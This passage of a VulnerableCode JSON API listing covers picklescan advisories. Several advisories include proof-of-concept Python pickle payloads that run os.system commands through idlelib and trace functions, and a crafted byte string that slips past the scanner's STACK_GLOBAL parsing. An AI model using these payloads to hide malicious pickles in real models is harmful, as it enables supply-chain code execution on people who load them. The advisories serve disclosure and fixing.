"https://github.com/mmaitre314/picklescan/security/advisories/GHSA-6w4w-5w54-rjvr" }, { "reference_url": "https://github.com/advisories/GHSA-6w4w-5w54-rjvr", "reference_id": "GHSA-6w4w-5w54-rjvr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6w4w-5w54-rjvr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89081?format=api", "purl": "pkg:pypi/picklescan@0.0.29", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.29" } ], "aliases": [ "GHSA-6w4w-5w54-rjvr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-6smr-kf6r-53gc" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360668?format=api", "vulnerability_id": "VCID-7dgj-c6cm-v3bt", "summary": "Picklescan is missing detection when calling built-in python idlelib.pyshell.ModifiedInterpreter.runcode\n### Summary\n\nUsing idlelib.pyshell.ModifiedInterpreter.runcode function, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to idlelib.pyshell.ModifiedInterpreter.runcode function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\n\nfrom idlelib.pyshell import ModifiedInterpreter\nfrom types import SimpleNamespace\n\nclass EvilIdlelibPyshellModifiedInterpreterRuncode:\n def __reduce__(self):\n payload = \"__import__('os').system('whoami')\"\n fake_self = SimpleNamespace(\n locals={},\n tkconsole=SimpleNamespace(\n executing=False,\n beginexecuting=str,\n canceled=False,\n closing=False,\n showtraceback=str,\n endexecuting=str,\n stderr=None,\n text=SimpleNamespace(),\n getvar=str\n ),\n rpcclt=None,\n debugger=None,\n checklinecache=str,\n active_seq=None,\n showtraceback=str,\n canceled=False,\n closing=False\n )\n return ModifiedInterpreter.runcode, (fake_self, payload)\n\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/1931c2d04eaca8d20597705ff39cab78ba364e4b" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-3gf5-cxq9-w223", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-3gf5-cxq9-w223" }, { "reference_url": "https://github.com/advisories/GHSA-3gf5-cxq9-w223", "reference_id": "GHSA-3gf5-cxq9-w223", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3gf5-cxq9-w223" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89082?format=api", "purl": "pkg:pypi/picklescan@0.0.30", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.30" } ], "aliases": [ "GHSA-3gf5-cxq9-w223" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7dgj-c6cm-v3bt" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360647?format=api", "vulnerability_id": "VCID-7jv5-uxzs-cucb", "summary": "Picklescan has a missing detection when calling built-in python idlelib.autocomplete.AutoComplete.fetch_completions\n### Summary\n\nUsing idlelib.autocomplete.AutoComplete.fetch_completions, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to idlelib.autocomplete.AutoComplete.fetch_completions function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nclass EvilIdlelibAutocompleteFetchCompletions:\n def __reduce__(self):\n from idlelib.autocomplete import AutoComplete, ATTRS\n return AutoComplete().fetch_completions, (\"__import__('os').system('whoami')\", ATTRS)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7cq8-mj8x-j263", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-7cq8-mj8x-j263" }, { "reference_url": "https://github.com/advisories/GHSA-7cq8-mj8x-j263", "reference_id": "GHSA-7cq8-mj8x-j263", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-7cq8-mj8x-j263" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89081?format=api", "purl": "pkg:pypi/picklescan@0.0.29", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.29" } ], "aliases": [ "GHSA-7cq8-mj8x-j263" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-7jv5-uxzs-cucb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360675?format=api", "vulnerability_id": "VCID-83zm-7pnx-gkag", "summary": "Picklescan has a missing detection when calling built-in python trace.Trace.run\n### Summary\n\nUsing trace.Trace.run, which is a built-in python library function to execute remote pickle file.\n\n### Details\n\nThe attack payload executes in the following steps:\n\nFirst, the attacker craft the payload by calling to trace.Trace.run function in reduce method\nThen when the victim after checking whether the pickle file is safe by using Picklescan library and this library doesn't dectect any dangerous functions, decide to pickle.load() this malicious pickle file, thus lead to remote code execution.\n\n### PoC\n\n```\nclass EvilTraceRun:\n def __reduce__(self):\n from trace import Trace\n payload = \"__import__('os').system('whoami')\"\n return Trace.run, (Trace(), payload)\n```\n\n### Impact\n\nWho is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.\nWhat is the impact? Attackers can embed malicious code in pickle file that remains undetected but executes when the pickle file is loaded.\nSupply Chain Attack: Attackers can distribute infected pickle files across ML models, APIs, or saved Python objects.\n\n### Corresponding\n\nhttps://github.com/FredericDT\nhttps://github.com/Qhaoduoyu", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/aecd11be98702caa9ba9b12189d91ad596a36114" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-5qwp-399c-mjwf", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-5qwp-399c-mjwf" }, { "reference_url": "https://github.com/advisories/GHSA-5qwp-399c-mjwf", "reference_id": "GHSA-5qwp-399c-mjwf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-5qwp-399c-mjwf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89081?format=api", "purl": "pkg:pypi/picklescan@0.0.29", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.29" } ], "aliases": [ "GHSA-5qwp-399c-mjwf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-83zm-7pnx-gkag" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360665?format=api", "vulnerability_id": "VCID-8bj4-tmz9-gyau", "summary": "Picklescan has pickle parsing logic flaw that leads to malicious pickle file bypass\n### Details\nThere's a parsing logic error in picklescan and modelscan while trying to deal with opcode `STACK_GLOBAL`.\nFunction `_list_globals` when handling `STACK_GLOBAL` at position `n`, it is expected to track two arguments but in wrong range. The loop only consider the range from `1` to `n-1` but forgets to consider the opcode at position `0`. The correct range should be `0` to `n-1`. Attacker can put arg in position `0`, thus the parser can only tract one argument. Then, the exception https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L281 will be triggered. Thus it can cause detection bypass since the malicious pickle file will trigger unexpected exceptions.\n\nExample:\n```\n 0: S STRING 'os' --> arg 0: STRING (untracked argument due to wrong scanning range)\n 6: S STRING 'system' --> arg 1: STRING (tracked argument)\n 16: \\x93 STACK_GLOBAL\n 17: S STRING 'ls'\n 23: \\x85 TUPLE1\n 24: R REDUCE\n 25: . STOP\n```\n\n\n### PoC\n``` python\nimport pickle\npayload = b\"S'os'\\nS'system'\\n\\x93S'ls'\\n\\x85R.\"\nwith open('bad_pickle.pkl', 'wb') as f:\n f.write(payload)\npickle.load(open('bad_pickle.pkl', 'rb'))\n```\n\n### Impact\nDetection bypass in both picklescan and modelscan. Note that it also affects the online hugging face pickle scanners, making the malicious pickle file bypass the detection. \n\n### Fix\nTo fix the range here, change `range(1, n)` to `range(1, n+1)` to ensure that `n-offset` stays within the range of `0` to `n`.\nhttps://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L255", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L255", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L255" }, { "reference_url": "https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L281", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/blob/2a8383cfeb4158567f9770d86597300c9e508d0f/src/picklescan/scanner.py#L281" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/58983e1c20973ac42f2df7ff15d7c8cd32f9b688", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/58983e1c20973ac42f2df7ff15d7c8cd32f9b688" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.27", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v0.0.27" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9gvj-pp9x-gcfr", "reference_id": "", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9gvj-pp9x-gcfr" }, { "reference_url": "https://github.com/advisories/GHSA-9gvj-pp9x-gcfr", "reference_id": "GHSA-9gvj-pp9x-gcfr", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9gvj-pp9x-gcfr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/89079?format=api", "purl": "pkg:pypi/picklescan@0.0.27", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1cft-ke16-8kac" }, { "vulnerability": "VCID-357d-3wwy-aubk" }, { "vulnerability": "VCID-38pp-fqgk-bygf" }, { "vulnerability": "VCID-3ykn-199q-u3hf" }, { "vulnerability": "VCID-46rw-3mfv-67ad" }, { "vulnerability": "VCID-4nda-nuz6-gqgm" }, { "vulnerability": "VCID-555e-6p5m-xbbc" }, { "vulnerability": "VCID-6723-ghp7-yqd1" }, { "vulnerability": "VCID-6pqf-4qcr-ckac" }, { "vulnerability": "VCID-6smr-kf6r-53gc" }, { "vulnerability": "VCID-7dgj-c6cm-v3bt" }, { "vulnerability": "VCID-7jv5-uxzs-cucb" }, { "vulnerability": "VCID-83zm-7pnx-gkag" }, { "vulnerability": "VCID-8fwp-rcz9-byam" }, { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-a31m-q2ca-w7em" }, { "vulnerability": "VCID-av36-fvk2-23be" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-b4zf-mwfc-53bm" }, { "vulnerability": "VCID-b8nm-k5xu-yfc8" }, { "vulnerability": "VCID-bepy-gm8w-83e5" }, { "vulnerability": "VCID-brvs-drts-rbay" }, { "vulnerability": "VCID-c3as-vdkf-4fem" }, { "vulnerability": "VCID-c5rh-vbqs-q7bp" }, { "vulnerability": "VCID-cj2u-dmaj-wbd4" }, { "vulnerability": "VCID-cq25-8mmm-3yfg" }, { "vulnerability": "VCID-cupp-7ca3-wfa6" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-d1k5-6npz-2kcg" }, { "vulnerability": "VCID-dsy5-2z6e-jqds" }, { "vulnerability": "VCID-e95k-rym7-a7bk" }, { "vulnerability": "VCID-fbng-xtyv-zqdf" }, { "vulnerability": "VCID-fkcx-bkmd-4bbe" }, { "vulnerability": "VCID-fsjg-pn1f-fqd6" }, { "vulnerability": "VCID-fvhz-kyju-qkg5" }, { "vulnerability": "VCID-fxc2-cr37-fuhg" }, { "vulnerability": "VCID-gbvh-fs1r-xqcw" }, { "vulnerability": "VCID-hg5h-54nq-bber" }, { "vulnerability": "VCID-hm3p-7t8t-bfb7" }, { "vulnerability": "VCID-jsfv-qjzd-87ck" }, { "vulnerability": "VCID-judk-maax-muc7" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" }, { "vulnerability": "VCID-kne4-tcp8-m3c3" }, { "vulnerability": "VCID-n3yg-3gcp-nyc1" }, { "vulnerability": "VCID-p42h-2wne-j3ds" }, { "vulnerability": "VCID-pfmh-d33z-9ka8" }, { "vulnerability": "VCID-q3ju-z2ut-mkgx" }, { "vulnerability": "VCID-re4f-xefn-x7fb" }, { "vulnerability": "VCID-ssnp-77kf-qudn" }, { "vulnerability": "VCID-v5yc-uwn3-akbc" }, { "vulnerability": "VCID-vgyv-ps7z-x7gc" }, { "vulnerability": "VCID-zh4p-1c3k-j3g8" }, { "vulnerability": "VCID-zhzt-rnfn-73ab" }, { "vulnerability": "VCID-zxc5-cgwk-qbcn" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@0.0.27" } ], "aliases": [ "GHSA-9gvj-pp9x-gcfr" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8bj4-tmz9-gyau" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212547?format=api", "vulnerability_id": "VCID-8fwp-rcz9-byam", "summary": "picklescan missing detection by simple obfuscation of a `builtins.eval` call", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/mmaitre314/picklescan/commit/173c8f2a869ea9b69b543477525ec70611c3c6f4", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/commit/173c8f2a869ea9b69b543477525ec70611c3c6f4" }, { "reference_url": "https://github.com/mmaitre314/picklescan/pull/59", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/pull/59" }, { "reference_url": "https://github.com/mmaitre314/picklescan/releases/tag/v1.0.1", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/releases/tag/v1.0.1" }, { "reference_url": "https://github.com/advisories/GHSA-9m3x-qqw2-h32h", "reference_id": "GHSA-9m3x-qqw2-h32h", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9m3x-qqw2-h32h" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9m3x-qqw2-h32h", "reference_id": "GHSA-9m3x-qqw2-h32h", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9m3x-qqw2-h32h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/38505?format=api", "purl": "pkg:pypi/picklescan@1.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-8q15-7ur4-kkde" }, { "vulnerability": "VCID-ay9k-cbe6-wye5" }, { "vulnerability": "VCID-czzc-g8zx-1kbq" }, { "vulnerability": "VCID-k92s-yfxv-hqhr" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:pypi/picklescan@1.0.1" } ], "aliases": [ "GHSA-9m3x-qqw2-h32h" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-8fwp-rcz9-byam" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/212707?format=api", "vulnerability_id": "VCID-8q15-7ur4-kkde", "summary": "PickleScan's pkgutil.resolve_name has a universal blocklist bypass", "references": [ { "reference_url": "https://github.com/mmaitre314/picklescan", "reference_id": "", "reference_type": "", "scores": [ { "value": "10.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/mmaitre314/picklescan" }, { "reference_url": "https://github.com/advisories/GHSA-vvpj-8cmc-gx39", "reference_id": "GHSA-vvpj-8cmc-gx39", "reference_type": "", "scores": [ { "value": "CRITICAL", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-vvpj-8cmc-gx39" }, { "reference_url": "https://github.com/mmaitre314/picklescan/security/advisories/GHSA-vvpj-8cmc-gx39", "reference_id": 